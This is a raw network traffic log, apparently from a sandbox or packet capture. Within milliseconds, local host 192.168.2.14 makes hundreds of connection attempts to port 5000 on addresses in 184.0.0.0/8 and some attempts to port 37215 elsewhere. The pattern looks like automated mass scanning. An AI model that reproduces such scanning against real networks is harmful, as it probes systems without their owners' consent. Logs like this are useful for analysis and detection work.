                                                    Jul 10, 2024 08:26:10.772986889 CEST500048611184.217.124.94192.168.2.14
                                                    Jul 10, 2024 08:26:10.772995949 CEST500048611184.251.171.254192.168.2.14
                                                    Jul 10, 2024 08:26:10.773005009 CEST500048611184.56.203.58192.168.2.14
                                                    Jul 10, 2024 08:26:10.773396015 CEST500048611184.170.152.23192.168.2.14
                                                    Jul 10, 2024 08:26:10.773406029 CEST500048611184.58.148.49192.168.2.14
                                                    Jul 10, 2024 08:26:10.773493052 CEST500048611184.162.92.211192.168.2.14
                                                    Jul 10, 2024 08:26:10.773709059 CEST500048611184.223.31.224192.168.2.14
                                                    Jul 10, 2024 08:26:10.773720026 CEST500048611184.219.115.120192.168.2.14
                                                    Jul 10, 2024 08:26:10.774024010 CEST500048611184.50.28.198192.168.2.14
                                                    Jul 10, 2024 08:26:10.774252892 CEST500048611184.32.168.223192.168.2.14
                                                    Jul 10, 2024 08:26:10.774262905 CEST500048611184.195.150.141192.168.2.14
                                                    Jul 10, 2024 08:26:10.774385929 CEST500048611184.173.79.166192.168.2.14
                                                    Jul 10, 2024 08:26:10.775127888 CEST500048611184.254.98.100192.168.2.14
                                                    Jul 10, 2024 08:26:10.775139093 CEST500048611184.240.133.49192.168.2.14
                                                    Jul 10, 2024 08:26:10.775147915 CEST500048611184.96.200.20192.168.2.14
                                                    Jul 10, 2024 08:26:10.775157928 CEST500048611184.135.177.159192.168.2.14
                                                    Jul 10, 2024 08:26:10.775638103 CEST500048611184.121.211.205192.168.2.14
                                                    Jul 10, 2024 08:26:10.775648117 CEST500048611184.37.205.226192.168.2.14
                                                    Jul 10, 2024 08:26:10.775656939 CEST500048611184.134.156.56192.168.2.14
                                                    Jul 10, 2024 08:26:10.775665998 CEST500048611184.90.169.206192.168.2.14
                                                    Jul 10, 2024 08:26:10.776120901 CEST500048611184.73.185.57192.168.2.14
                                                    Jul 10, 2024 08:26:10.776130915 CEST500048611184.186.149.57192.168.2.14
                                                    Jul 10, 2024 08:26:10.776141882 CEST500048611184.252.26.197192.168.2.14
                                                    Jul 10, 2024 08:26:10.776463985 CEST486115000192.168.2.14184.250.72.204
                                                    Jul 10, 2024 08:26:10.776463985 CEST486115000192.168.2.14184.139.69.218
                                                    Jul 10, 2024 08:26:10.776463985 CEST486115000192.168.2.14184.35.109.213
                                                    Jul 10, 2024 08:26:10.776463985 CEST486115000192.168.2.14184.226.196.165
                                                    Jul 10, 2024 08:26:10.776463985 CEST486115000192.168.2.14184.165.169.174
                                                    Jul 10, 2024 08:26:10.776463985 CEST486115000192.168.2.14184.212.114.179
                                                    Jul 10, 2024 08:26:10.776463985 CEST486115000192.168.2.14184.209.140.137
                                                    Jul 10, 2024 08:26:10.776463985 CEST486115000192.168.2.14184.109.52.36
                                                    Jul 10, 2024 08:26:10.776496887 CEST500048611184.105.135.75192.168.2.14
                                                    Jul 10, 2024 08:26:10.776510000 CEST500048611184.75.62.7192.168.2.14
                                                    Jul 10, 2024 08:26:10.777020931 CEST500048611184.77.194.195192.168.2.14
                                                    Jul 10, 2024 08:26:10.777030945 CEST500048611184.65.19.144192.168.2.14
                                                    Jul 10, 2024 08:26:10.777040005 CEST500048611184.89.253.218192.168.2.14
                                                    Jul 10, 2024 08:26:10.777049065 CEST500048611184.164.217.225192.168.2.14
                                                    Jul 10, 2024 08:26:10.777390957 CEST4708337215192.168.2.14157.194.16.3
                                                    Jul 10, 2024 08:26:10.777390957 CEST486115000192.168.2.14184.248.133.237
                                                    Jul 10, 2024 08:26:10.777390957 CEST486115000192.168.2.14184.101.113.153
                                                    Jul 10, 2024 08:26:10.777390957 CEST486115000192.168.2.14184.127.11.142
                                                    Jul 10, 2024 08:26:10.777390957 CEST486115000192.168.2.14184.38.195.77
                                                    Jul 10, 2024 08:26:10.777390957 CEST486115000192.168.2.14184.253.114.20
                                                    Jul 10, 2024 08:26:10.777390957 CEST486115000192.168.2.14184.101.136.114
                                                    Jul 10, 2024 08:26:10.777390957 CEST486115000192.168.2.14184.58.177.232
                                                    Jul 10, 2024 08:26:10.777801991 CEST500048611184.47.183.20192.168.2.14
                                                    Jul 10, 2024 08:26:10.777812004 CEST500048611184.31.114.50192.168.2.14
                                                    Jul 10, 2024 08:26:10.777822018 CEST500048611184.183.172.101192.168.2.14
                                                    Jul 10, 2024 08:26:10.777827024 CEST486115000192.168.2.14184.213.217.192
                                                    Jul 10, 2024 08:26:10.777827024 CEST4708337215192.168.2.14197.139.151.200
                                                    Jul 10, 2024 08:26:10.777827024 CEST486115000192.168.2.14184.194.174.108
                                                    Jul 10, 2024 08:26:10.777827024 CEST486115000192.168.2.14184.39.146.99
                                                    Jul 10, 2024 08:26:10.777827024 CEST486115000192.168.2.14184.187.134.131
                                                    Jul 10, 2024 08:26:10.777827024 CEST486115000192.168.2.14184.13.77.235
                                                    Jul 10, 2024 08:26:10.777827024 CEST486115000192.168.2.14184.80.123.148
                                                    Jul 10, 2024 08:26:10.777827024 CEST486115000192.168.2.14184.91.13.85
                                                    Jul 10, 2024 08:26:10.777831078 CEST500048611184.58.110.42192.168.2.14
                                                    Jul 10, 2024 08:26:10.777968884 CEST500048611184.211.177.106192.168.2.14
                                                    Jul 10, 2024 08:26:10.778150082 CEST500048611184.122.207.3192.168.2.14
                                                    Jul 10, 2024 08:26:10.778534889 CEST500048611184.221.172.13192.168.2.14
                                                    Jul 10, 2024 08:26:10.778805971 CEST500048611184.101.195.140192.168.2.14
                                                    Jul 10, 2024 08:26:10.778815985 CEST500048611184.188.147.185192.168.2.14
                                                    Jul 10, 2024 08:26:10.779006958 CEST500048611184.95.248.159192.168.2.14
                                                    Jul 10, 2024 08:26:10.779129028 CEST500048611184.65.41.203192.168.2.14
                                                    Jul 10, 2024 08:26:10.779233932 CEST500048611184.78.171.98192.168.2.14
                                                    Jul 10, 2024 08:26:10.779700994 CEST500048611184.184.70.67192.168.2.14
                                                    Jul 10, 2024 08:26:10.779719114 CEST500048611184.171.69.160192.168.2.14
                                                    Jul 10, 2024 08:26:10.779727936 CEST500048611184.7.18.68192.168.2.14
                                                    Jul 10, 2024 08:26:10.780119896 CEST500048611184.81.236.88192.168.2.14
                                                    Jul 10, 2024 08:26:10.780282021 CEST500048611184.27.222.161192.168.2.14
                                                    Jul 10, 2024 08:26:10.780328035 CEST500048611184.124.40.47192.168.2.14
                                                    Jul 10, 2024 08:26:10.780355930 CEST486115000192.168.2.14184.182.107.117
                                                    Jul 10, 2024 08:26:10.780355930 CEST486115000192.168.2.14184.219.128.242
                                                    Jul 10, 2024 08:26:10.780355930 CEST486115000192.168.2.14184.3.100.84
                                                    Jul 10, 2024 08:26:10.780355930 CEST486115000192.168.2.14184.160.27.149
                                                    Jul 10, 2024 08:26:10.780355930 CEST486115000192.168.2.14184.236.254.211
                                                    Jul 10, 2024 08:26:10.780355930 CEST486115000192.168.2.14184.12.146.174
                                                    Jul 10, 2024 08:26:10.780355930 CEST486115000192.168.2.14184.54.127.16
                                                    Jul 10, 2024 08:26:10.780355930 CEST4708337215192.168.2.1441.215.56.99
                                                    Jul 10, 2024 08:26:10.780509949 CEST500048611184.3.62.98192.168.2.14
                                                    Jul 10, 2024 08:26:10.780635118 CEST500048611184.17.35.62192.168.2.14
                                                    Jul 10, 2024 08:26:10.780720949 CEST486115000192.168.2.14184.16.86.114
                                                    Jul 10, 2024 08:26:10.780720949 CEST486115000192.168.2.14184.89.243.153
                                                    Jul 10, 2024 08:26:10.780720949 CEST486115000192.168.2.14184.16.248.195
                                                    Jul 10, 2024 08:26:10.780720949 CEST486115000192.168.2.14184.53.26.211
                                                    Jul 10, 2024 08:26:10.780720949 CEST486115000192.168.2.14184.88.145.106
                                                    Jul 10, 2024 08:26:10.780720949 CEST486115000192.168.2.14184.220.250.181
                                                    Jul 10, 2024 08:26:10.780721903 CEST4708337215192.168.2.1441.9.195.101
                                                    Jul 10, 2024 08:26:10.780721903 CEST486115000192.168.2.14184.245.16.81
                                                    Jul 10, 2024 08:26:10.780853987 CEST500048611184.93.105.226192.168.2.14
                                                    Jul 10, 2024 08:26:10.780934095 CEST500048611184.77.147.234192.168.2.14
                                                    Jul 10, 2024 08:26:10.781224966 CEST500048611184.62.47.12192.168.2.14
                                                    Jul 10, 2024 08:26:10.781457901 CEST500048611184.210.60.180192.168.2.14
                                                    Jul 10, 2024 08:26:10.781549931 CEST500048611184.133.68.143192.168.2.14
                                                    Jul 10, 2024 08:26:10.781596899 CEST500048611184.176.54.85192.168.2.14
                                                    Jul 10, 2024 08:26:10.781696081 CEST500048611184.20.29.241192.168.2.14
                                                    Jul 10, 2024 08:26:10.781824112 CEST500048611184.250.72.204192.168.2.14
                                                    Jul 10, 2024 08:26:10.781974077 CEST500048611184.60.203.209192.168.2.14
                                                    Jul 10, 2024 08:26:10.782071114 CEST486115000192.168.2.14184.107.138.205
                                                    Jul 10, 2024 08:26:10.782071114 CEST486115000192.168.2.14184.194.25.255
                                                    Jul 10, 2024 08:26:10.782071114 CEST486115000192.168.2.14184.101.228.26
                                                    Jul 10, 2024 08:26:10.782071114 CEST486115000192.168.2.14184.208.194.173
                                                    Jul 10, 2024 08:26:10.782071114 CEST486115000192.168.2.14184.230.108.225
                                                    Jul 10, 2024 08:26:10.782071114 CEST486115000192.168.2.14184.134.20.72
                                                    Jul 10, 2024 08:26:10.782071114 CEST486115000192.168.2.14184.224.196.204
                                                    Jul 10, 2024 08:26:10.782071114 CEST486115000192.168.2.14184.140.164.219
                                                    Jul 10, 2024 08:26:10.782147884 CEST500048611184.85.206.8192.168.2.14
                                                    Jul 10, 2024 08:26:10.782332897 CEST500048611184.235.175.30192.168.2.14
                                                    Jul 10, 2024 08:26:10.782512903 CEST500048611184.91.10.101192.168.2.14
                                                    Jul 10, 2024 08:26:10.782740116 CEST500048611184.61.50.97192.168.2.14
                                                    Jul 10, 2024 08:26:10.782818079 CEST500048611184.139.69.218192.168.2.14
                                                    Jul 10, 2024 08:26:10.783000946 CEST500048611184.213.217.192192.168.2.14
                                                    Jul 10, 2024 08:26:10.783225060 CEST500048611184.214.132.152192.168.2.14
                                                    Jul 10, 2024 08:26:10.783529043 CEST500048611184.35.109.213192.168.2.14
                                                    Jul 10, 2024 08:26:10.784054041 CEST486115000192.168.2.14184.52.122.128
                                                    Jul 10, 2024 08:26:10.784054041 CEST486115000192.168.2.14184.8.216.164
                                                    Jul 10, 2024 08:26:10.784054041 CEST486115000192.168.2.14184.46.108.90
                                                    Jul 10, 2024 08:26:10.784054041 CEST486115000192.168.2.14184.66.133.234
                                                    Jul 10, 2024 08:26:10.784054041 CEST486115000192.168.2.14184.83.159.178
                                                    Jul 10, 2024 08:26:10.784054041 CEST486115000192.168.2.14184.85.70.72
                                                    Jul 10, 2024 08:26:10.784054041 CEST486115000192.168.2.14184.170.85.167
                                                    Jul 10, 2024 08:26:10.784054041 CEST486115000192.168.2.14184.198.47.55
                                                    Jul 10, 2024 08:26:10.784090996 CEST500048611184.69.23.26192.168.2.14
                                                    Jul 10, 2024 08:26:10.784137964 CEST500048611184.194.174.108192.168.2.14
                                                    Jul 10, 2024 08:26:10.784511089 CEST500048611184.248.133.237192.168.2.14
                                                    Jul 10, 2024 08:26:10.784521103 CEST500048611184.26.234.181192.168.2.14
                                                    Jul 10, 2024 08:26:10.784590006 CEST486115000192.168.2.14184.216.184.54
                                                    Jul 10, 2024 08:26:10.784590006 CEST486115000192.168.2.14184.18.255.157
                                                    Jul 10, 2024 08:26:10.784590006 CEST486115000192.168.2.14184.183.234.207
                                                    Jul 10, 2024 08:26:10.784590006 CEST4708337215192.168.2.1489.24.181.240
                                                    Jul 10, 2024 08:26:10.784590006 CEST486115000192.168.2.14184.22.43.92
                                                    Jul 10, 2024 08:26:10.784590006 CEST486115000192.168.2.14184.243.16.40
                                                    Jul 10, 2024 08:26:10.784590006 CEST486115000192.168.2.14184.189.20.219
                                                    Jul 10, 2024 08:26:10.784590006 CEST486115000192.168.2.14184.33.250.39
                                                    Jul 10, 2024 08:26:10.785152912 CEST500048611184.226.196.165192.168.2.14
                                                    Jul 10, 2024 08:26:10.785164118 CEST500048611184.48.149.223192.168.2.14
                                                    Jul 10, 2024 08:26:10.785173893 CEST500048611184.165.169.174192.168.2.14
                                                    Jul 10, 2024 08:26:10.785182953 CEST500048611184.104.251.193192.168.2.14
                                                    Jul 10, 2024 08:26:10.785490036 CEST500048611184.199.167.182192.168.2.14
                                                    Jul 10, 2024 08:26:10.785505056 CEST4708337215192.168.2.14157.44.215.50
                                                    Jul 10, 2024 08:26:10.785505056 CEST486115000192.168.2.14184.173.49.233
                                                    Jul 10, 2024 08:26:10.785505056 CEST486115000192.168.2.14184.70.251.68
                                                    Jul 10, 2024 08:26:10.785505056 CEST486115000192.168.2.14184.64.175.87
                                                    Jul 10, 2024 08:26:10.785505056 CEST486115000192.168.2.14184.193.162.143
                                                    Jul 10, 2024 08:26:10.785505056 CEST4708337215192.168.2.14197.43.251.239
                                                    Jul 10, 2024 08:26:10.785505056 CEST486115000192.168.2.14184.39.67.64
                                                    Jul 10, 2024 08:26:10.785505056 CEST486115000192.168.2.14184.216.82.74
                                                    Jul 10, 2024 08:26:10.785788059 CEST500048611184.186.160.244192.168.2.14
                                                    Jul 10, 2024 08:26:10.786195993 CEST500048611184.56.187.139192.168.2.14
                                                    Jul 10, 2024 08:26:10.786206007 CEST500048611184.9.112.76192.168.2.14
                                                    Jul 10, 2024 08:26:10.786215067 CEST500048611184.101.113.153192.168.2.14
                                                    Jul 10, 2024 08:26:10.786451101 CEST500048611184.212.114.179192.168.2.14
                                                    Jul 10, 2024 08:26:10.786504984 CEST500048611184.182.107.117192.168.2.14
                                                    Jul 10, 2024 08:26:10.787075996 CEST500048611184.148.194.109192.168.2.14
                                                    Jul 10, 2024 08:26:10.787292004 CEST500048611184.219.128.242192.168.2.14
                                                    Jul 10, 2024 08:26:10.787302971 CEST500048611184.127.11.142192.168.2.14
                                                    Jul 10, 2024 08:26:10.787445068 CEST500048611211.74.190.221192.168.2.14
                                                    Jul 10, 2024 08:26:10.787456036 CEST500048611211.86.51.197192.168.2.14
                                                    Jul 10, 2024 08:26:10.787466049 CEST500048611211.52.86.172192.168.2.14
                                                    Jul 10, 2024 08:26:10.787475109 CEST500048611211.114.1.60192.168.2.14
                                                    Jul 10, 2024 08:26:10.787484884 CEST500048611211.113.205.68192.168.2.14
                                                    Jul 10, 2024 08:26:10.787494898 CEST500048611211.220.136.243192.168.2.14
                                                    Jul 10, 2024 08:26:10.787504911 CEST500048611211.209.148.252192.168.2.14
                                                    Jul 10, 2024 08:26:10.787520885 CEST500048611211.44.70.19192.168.2.14
                                                    Jul 10, 2024 08:26:10.787530899 CEST500048611211.172.198.205192.168.2.14
                                                    Jul 10, 2024 08:26:10.787539959 CEST500048611211.30.11.0192.168.2.14
                                                    Jul 10, 2024 08:26:10.787549973 CEST500048611211.235.4.111192.168.2.14
                                                    Jul 10, 2024 08:26:10.787559032 CEST500048611211.106.83.26192.168.2.14
                                                    Jul 10, 2024 08:26:10.787570953 CEST500048611211.208.75.246192.168.2.14
                                                    Jul 10, 2024 08:26:10.787580967 CEST500048611211.120.72.122192.168.2.14
                                                    Jul 10, 2024 08:26:10.787590027 CEST500048611211.83.53.105192.168.2.14
                                                    Jul 10, 2024 08:26:10.787599087 CEST500048611211.124.49.107192.168.2.14
                                                    Jul 10, 2024 08:26:10.787607908 CEST500048611211.110.43.105192.168.2.14
                                                    Jul 10, 2024 08:26:10.787616968 CEST500048611211.201.162.64192.168.2.14
                                                    Jul 10, 2024 08:26:10.787625074 CEST500048611211.69.177.220192.168.2.14
                                                    Jul 10, 2024 08:26:10.787635088 CEST500048611211.179.108.47192.168.2.14
                                                    Jul 10, 2024 08:26:10.787642956 CEST500048611211.202.63.248192.168.2.14
                                                    Jul 10, 2024 08:26:10.787652969 CEST500048611211.44.51.189192.168.2.14
                                                    Jul 10, 2024 08:26:10.787662029 CEST500048611211.123.152.32192.168.2.14
                                                    Jul 10, 2024 08:26:10.787671089 CEST500048611211.168.204.198192.168.2.14
                                                    Jul 10, 2024 08:26:10.787679911 CEST500048611211.53.127.117192.168.2.14
                                                    Jul 10, 2024 08:26:10.787688971 CEST500048611211.93.222.69192.168.2.14
                                                    Jul 10, 2024 08:26:10.787698030 CEST500048611211.231.144.92192.168.2.14
                                                    Jul 10, 2024 08:26:10.787708044 CEST500048611211.211.216.224192.168.2.14
                                                    Jul 10, 2024 08:26:10.787724972 CEST500048611184.4.67.138192.168.2.14
                                                    Jul 10, 2024 08:26:10.787734985 CEST500048611184.108.192.130192.168.2.14
                                                    Jul 10, 2024 08:26:10.787914038 CEST500048611184.107.138.205192.168.2.14
                                                    Jul 10, 2024 08:26:10.787992954 CEST4708337215192.168.2.14197.78.140.121
                                                    Jul 10, 2024 08:26:10.787992954 CEST486115000192.168.2.14184.5.107.72
                                                    Jul 10, 2024 08:26:10.787992954 CEST486115000192.168.2.14184.245.152.13
                                                    Jul 10, 2024 08:26:10.787992954 CEST486115000192.168.2.14184.46.49.125
                                                    Jul 10, 2024 08:26:10.787992954 CEST486115000192.168.2.14184.175.144.241
                                                    Jul 10, 2024 08:26:10.787992954 CEST486115000192.168.2.14184.210.205.62
                                                    Jul 10, 2024 08:26:10.787992954 CEST486115000192.168.2.14184.82.220.226
                                                    Jul 10, 2024 08:26:10.787992954 CEST486115000192.168.2.14184.226.75.56
                                                    Jul 10, 2024 08:26:10.788018942 CEST500048611184.39.146.99192.168.2.14
                                                    Jul 10, 2024 08:26:10.788028955 CEST500048611184.3.100.84192.168.2.14
                                                    Jul 10, 2024 08:26:10.788441896 CEST500048611184.209.140.137192.168.2.14
                                                    Jul 10, 2024 08:26:10.788781881 CEST500048611184.187.134.131192.168.2.14
                                                    Jul 10, 2024 08:26:10.788791895 CEST500048611184.194.25.255192.168.2.14
                                                    Jul 10, 2024 08:26:10.789009094 CEST500048611184.77.10.131192.168.2.14
                                                    Jul 10, 2024 08:26:10.789119005 CEST500048611184.16.86.114192.168.2.14
                                                    Jul 10, 2024 08:26:10.789164066 CEST486115000192.168.2.14184.151.222.200
                                                    Jul 10, 2024 08:26:10.789164066 CEST486115000192.168.2.14184.132.111.184
                                                    Jul 10, 2024 08:26:10.789164066 CEST486115000192.168.2.14184.124.130.106
                                                    Jul 10, 2024 08:26:10.789165020 CEST486115000192.168.2.14184.18.223.97
                                                    Jul 10, 2024 08:26:10.789165020 CEST486115000192.168.2.14184.65.197.162
                                                    Jul 10, 2024 08:26:10.789165020 CEST486115000192.168.2.14184.23.219.233
                                                    Jul 10, 2024 08:26:10.789165020 CEST486115000192.168.2.14184.126.170.12
                                                    Jul 10, 2024 08:26:10.789165020 CEST486115000192.168.2.14184.34.131.215
                                                    Jul 10, 2024 08:26:10.789175987 CEST500048611184.101.228.26192.168.2.14
                                                    Jul 10, 2024 08:26:10.789297104 CEST486115000192.168.2.14184.55.12.65
                                                    Jul 10, 2024 08:26:10.789297104 CEST486115000192.168.2.14184.72.161.206
                                                    Jul 10, 2024 08:26:10.789297104 CEST486115000192.168.2.14184.145.52.220
                                                    Jul 10, 2024 08:26:10.789297104 CEST486115000192.168.2.14184.56.20.90
                                                    Jul 10, 2024 08:26:10.789297104 CEST486115000192.168.2.14184.2.184.185
                                                    Jul 10, 2024 08:26:10.789297104 CEST486115000192.168.2.14184.122.37.152
                                                    Jul 10, 2024 08:26:10.789297104 CEST486115000192.168.2.14184.99.165.160
                                                    Jul 10, 2024 08:26:10.789297104 CEST486115000192.168.2.14184.187.158.71
                                                    Jul 10, 2024 08:26:10.789772034 CEST500048611184.225.9.219192.168.2.14
                                                    Jul 10, 2024 08:26:10.789782047 CEST500048611184.89.243.153192.168.2.14
                                                    Jul 10, 2024 08:26:10.789918900 CEST500048611184.160.27.149192.168.2.14
                                                    Jul 10, 2024 08:26:10.790155888 CEST500048611184.52.122.128192.168.2.14
                                                    Jul 10, 2024 08:26:10.790893078 CEST500048611184.38.195.77192.168.2.14
                                                    Jul 10, 2024 08:26:10.790904999 CEST500048611184.8.216.164192.168.2.14
                                                    Jul 10, 2024 08:26:10.790915012 CEST500048611184.109.52.36192.168.2.14
                                                    Jul 10, 2024 08:26:10.791017056 CEST500048611184.216.184.54192.168.2.14
                                                    Jul 10, 2024 08:26:10.791027069 CEST500048611184.16.248.195192.168.2.14
                                                    Jul 10, 2024 08:26:10.791038036 CEST500048611184.13.77.235192.168.2.14
                                                    Jul 10, 2024 08:26:10.791399002 CEST500048611184.236.254.211192.168.2.14
                                                    Jul 10, 2024 08:26:10.791464090 CEST500048611184.173.49.233192.168.2.14
                                                    Jul 10, 2024 08:26:10.791793108 CEST500048611184.80.123.148192.168.2.14
                                                    Jul 10, 2024 08:26:10.792078018 CEST500048611184.46.108.90192.168.2.14
                                                    Jul 10, 2024 08:26:10.792088985 CEST500048611184.53.26.211192.168.2.14
                                                    Jul 10, 2024 08:26:10.792498112 CEST500048611184.66.133.234192.168.2.14
                                                    Jul 10, 2024 08:26:10.792516947 CEST500048611184.12.146.174192.168.2.14
                                                    Jul 10, 2024 08:26:10.792526960 CEST500048611184.253.114.20192.168.2.14
                                                    Jul 10, 2024 08:26:10.792536020 CEST500048611184.70.251.68192.168.2.14
                                                    Jul 10, 2024 08:26:10.792728901 CEST500048611184.83.159.178192.168.2.14
                                                    Jul 10, 2024 08:26:10.792732000 CEST486115000192.168.2.14184.186.155.219
                                                    Jul 10, 2024 08:26:10.792732000 CEST486115000192.168.2.14184.127.209.53
                                                    Jul 10, 2024 08:26:10.792732000 CEST4708337215192.168.2.14111.212.211.64
                                                    Jul 10, 2024 08:26:10.792740107 CEST500048611184.91.13.85192.168.2.14
                                                    Jul 10, 2024 08:26:10.792732000 CEST486115000192.168.2.14184.248.179.219
                                                    Jul 10, 2024 08:26:10.792732000 CEST486115000192.168.2.14184.124.188.142
                                                    Jul 10, 2024 08:26:10.792732000 CEST486115000192.168.2.14184.156.174.116
                                                    Jul 10, 2024 08:26:10.792732000 CEST486115000192.168.2.14184.134.237.98
                                                    Jul 10, 2024 08:26:10.792732000 CEST486115000192.168.2.14184.60.163.186
                                                    Jul 10, 2024 08:26:10.792977095 CEST500048611184.54.127.16192.168.2.14
                                                    Jul 10, 2024 08:26:10.793095112 CEST486115000192.168.2.14184.161.25.34
                                                    Jul 10, 2024 08:26:10.793095112 CEST486115000192.168.2.14184.8.76.33
                                                    Jul 10, 2024 08:26:10.793095112 CEST486115000192.168.2.14184.32.104.89
                                                    Jul 10, 2024 08:26:10.793095112 CEST486115000192.168.2.14184.88.193.160
                                                    Jul 10, 2024 08:26:10.793095112 CEST486115000192.168.2.14184.223.99.239
                                                    Jul 10, 2024 08:26:10.793095112 CEST486115000192.168.2.14184.252.101.109
                                                    Jul 10, 2024 08:26:10.793095112 CEST486115000192.168.2.14184.86.20.235
                                                    Jul 10, 2024 08:26:10.793095112 CEST486115000192.168.2.14184.24.227.77
                                                    Jul 10, 2024 08:26:10.793697119 CEST500048611184.101.136.114192.168.2.14
                                                    Jul 10, 2024 08:26:10.793709040 CEST500048611184.88.145.106192.168.2.14
                                                    Jul 10, 2024 08:26:10.793874025 CEST500048611184.18.255.157192.168.2.14
                                                    Jul 10, 2024 08:26:10.793884993 CEST500048611184.208.194.173192.168.2.14
                                                    Jul 10, 2024 08:26:10.793894053 CEST500048611184.58.177.232192.168.2.14
                                                    Jul 10, 2024 08:26:10.793946028 CEST486115000192.168.2.14184.106.106.35
                                                    Jul 10, 2024 08:26:10.793946028 CEST486115000192.168.2.14184.47.254.227
                                                    Jul 10, 2024 08:26:10.793946028 CEST486115000192.168.2.14184.13.39.120
                                                    Jul 10, 2024 08:26:10.793946028 CEST486115000192.168.2.14184.86.90.188
                                                    Jul 10, 2024 08:26:10.793946028 CEST4708337215192.168.2.1441.159.106.191
                                                    Jul 10, 2024 08:26:10.793946028 CEST4708337215192.168.2.1441.186.26.120
                                                    Jul 10, 2024 08:26:10.793946028 CEST486115000192.168.2.14184.235.8.230
                                                    Jul 10, 2024 08:26:10.793946028 CEST486115000192.168.2.14184.230.241.111
                                                    Jul 10, 2024 08:26:10.794256926 CEST500048611184.64.175.87192.168.2.14
                                                    Jul 10, 2024 08:26:10.794661045 CEST500048611184.85.70.72192.168.2.14
                                                    Jul 10, 2024 08:26:10.794820070 CEST500048611184.151.222.200192.168.2.14
                                                    Jul 10, 2024 08:26:10.794912100 CEST500048611184.5.107.72192.168.2.14
                                                    Jul 10, 2024 08:26:10.795098066 CEST500048611184.220.250.181192.168.2.14
                                                    Jul 10, 2024 08:26:10.795583010 CEST486115000192.168.2.14184.63.111.218
                                                    Jul 10, 2024 08:26:10.795583010 CEST486115000192.168.2.14184.106.58.102
                                                    Jul 10, 2024 08:26:10.795583010 CEST486115000192.168.2.14184.150.109.236
                                                    Jul 10, 2024 08:26:10.795583010 CEST486115000192.168.2.14184.4.194.174
                                                    Jul 10, 2024 08:26:10.795583010 CEST486115000192.168.2.14184.48.230.7
                                                    Jul 10, 2024 08:26:10.795583010 CEST486115000192.168.2.14184.42.32.89
                                                    Jul 10, 2024 08:26:10.795583010 CEST486115000192.168.2.14184.234.10.27
                                                    Jul 10, 2024 08:26:10.795583010 CEST486115000192.168.2.14184.234.227.103
                                                    Jul 10, 2024 08:26:10.795838118 CEST500048611184.230.108.225192.168.2.14
                                                    Jul 10, 2024 08:26:10.795849085 CEST500048611184.134.20.72192.168.2.14
                                                    Jul 10, 2024 08:26:10.795857906 CEST500048611184.193.162.143192.168.2.14
                                                    Jul 10, 2024 08:26:10.795869112 CEST500048611184.183.234.207192.168.2.14
                                                    Jul 10, 2024 08:26:10.796293020 CEST500048611184.224.196.204192.168.2.14
                                                    Jul 10, 2024 08:26:10.796303988 CEST500048611184.55.12.65192.168.2.14
                                                    Jul 10, 2024 08:26:10.796370029 CEST486115000192.168.2.14184.40.163.129
                                                    Jul 10, 2024 08:26:10.796370029 CEST486115000192.168.2.14184.140.159.248
                                                    Jul 10, 2024 08:26:10.796370029 CEST486115000192.168.2.14184.178.140.111
                                                    Jul 10, 2024 08:26:10.796370029 CEST486115000192.168.2.14184.199.146.98
                                                    Jul 10, 2024 08:26:10.796370029 CEST486115000192.168.2.14184.8.194.6
                                                    Jul 10, 2024 08:26:10.796370029 CEST486115000192.168.2.14184.115.76.217
                                                    Jul 10, 2024 08:26:10.796370029 CEST486115000192.168.2.14184.138.103.90
                                                    Jul 10, 2024 08:26:10.796370029 CEST486115000192.168.2.14184.204.42.67
                                                    Jul 10, 2024 08:26:10.796541929 CEST500048611184.132.111.184192.168.2.14
                                                    Jul 10, 2024 08:26:10.796674967 CEST500048611184.245.152.13192.168.2.14
                                                    Jul 10, 2024 08:26:10.796730042 CEST500048611184.72.161.206192.168.2.14
                                                    Jul 10, 2024 08:26:10.796772003 CEST500048611184.46.49.125192.168.2.14
                                                    Jul 10, 2024 08:26:10.797135115 CEST500048611184.170.85.167192.168.2.14
                                                    Jul 10, 2024 08:26:10.797156096 CEST500048611184.145.52.220192.168.2.14
                                                    Jul 10, 2024 08:26:10.797725916 CEST486115000192.168.2.14184.169.113.245
                                                    Jul 10, 2024 08:26:10.797725916 CEST486115000192.168.2.14184.15.63.61
                                                    Jul 10, 2024 08:26:10.797725916 CEST486115000192.168.2.14184.27.23.18
                                                    Jul 10, 2024 08:26:10.797725916 CEST486115000192.168.2.14184.120.2.150
                                                    Jul 10, 2024 08:26:10.797725916 CEST486115000192.168.2.14184.150.199.229
                                                    Jul 10, 2024 08:26:10.797725916 CEST486115000192.168.2.14184.214.39.181
                                                    Jul 10, 2024 08:26:10.797725916 CEST486115000192.168.2.14184.51.193.236
                                                    Jul 10, 2024 08:26:10.797725916 CEST486115000192.168.2.14184.101.137.236
                                                    Jul 10, 2024 08:26:10.797926903 CEST500048611184.140.164.219192.168.2.14
                                                    Jul 10, 2024 08:26:10.797940016 CEST500048611184.56.20.90192.168.2.14
                                                    Jul 10, 2024 08:26:10.798360109 CEST500048611184.198.47.55192.168.2.14
                                                    Jul 10, 2024 08:26:10.798372030 CEST500048611184.2.184.185192.168.2.14
                                                    Jul 10, 2024 08:26:10.798382044 CEST500048611184.175.144.241192.168.2.14
                                                    Jul 10, 2024 08:26:10.798389912 CEST500048611184.39.67.64192.168.2.14
                                                    Jul 10, 2024 08:26:10.799321890 CEST500048611184.186.155.219192.168.2.14
                                                    Jul 10, 2024 08:26:10.799335003 CEST500048611184.245.16.81192.168.2.14
                                                    Jul 10, 2024 08:26:10.799343109 CEST500048611184.210.205.62192.168.2.14
                                                    Jul 10, 2024 08:26:10.799352884 CEST500048611184.106.106.35192.168.2.14
                                                    Jul 10, 2024 08:26:10.799860001 CEST486115000192.168.2.14184.163.202.122
                                                    Jul 10, 2024 08:26:10.799860001 CEST486115000192.168.2.14184.240.121.177
                                                    Jul 10, 2024 08:26:10.799860001 CEST486115000192.168.2.14184.244.229.67
                                                    Jul 10, 2024 08:26:10.799860001 CEST486115000192.168.2.14184.32.91.120
                                                    Jul 10, 2024 08:26:10.799860001 CEST486115000192.168.2.14184.227.136.253
                                                    Jul 10, 2024 08:26:10.799860001 CEST486115000192.168.2.14184.154.169.189
                                                    Jul 10, 2024 08:26:10.799860001 CEST486115000192.168.2.14184.233.205.33
                                                    Jul 10, 2024 08:26:10.799860001 CEST486115000192.168.2.14184.122.144.133
                                                    Jul 10, 2024 08:26:10.799926996 CEST500048611184.122.37.152192.168.2.14
                                                    Jul 10, 2024 08:26:10.799938917 CEST500048611184.47.254.227192.168.2.14
                                                    Jul 10, 2024 08:26:10.800149918 CEST500048611184.124.130.106192.168.2.14
                                                    Jul 10, 2024 08:26:10.800160885 CEST500048611184.82.220.226192.168.2.14
